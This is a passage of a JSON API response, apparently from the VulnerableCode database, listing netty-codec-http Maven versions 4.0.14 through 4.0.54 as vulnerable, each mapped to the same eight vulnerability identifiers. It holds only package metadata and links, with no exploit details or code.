bility":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.14.Beta1"},{"url":"http://public2.vulnerablecode.io/api/packages/193772?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.14.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.14.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193773?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.15.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.15.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193774?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.16.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.16.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193775?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.17.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.17.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193776?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.18.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.18.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193777?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.19.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.19.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193778?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.20.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.20.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193779?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.21.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.21.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193780?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.22.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.22.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193781?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.23.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.23.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193782?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.24.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.24.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193783?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.25.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.25.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193784?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.26.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.26.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193785?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.27.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.27.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193786?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.28.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.28.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193787?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.29.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.29.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193788?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.30.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.30.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193789?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.31.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.31.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193790?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.32.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.32.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193791?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.33.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.33.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193792?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.34.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.34.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193793?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.35.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.35.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193794?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.36.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.36.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193795?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.37.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.37.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193796?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.38.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.38.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193797?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.39.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.39.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193798?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.40.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.40.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193799?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.41.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.41.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193800?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.42.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.42.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193801?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.43.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.43.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193802?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.44.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.44.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193803?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.45.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.45.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193804?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.46.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.46.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193805?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.47.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.47.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193806?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.48.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.48.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193807?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.49.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.49.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193808?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.50.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.50.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193809?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.51.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.51.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193810?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.52.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.52.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193811?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.53.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.53.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193812?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.54.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCI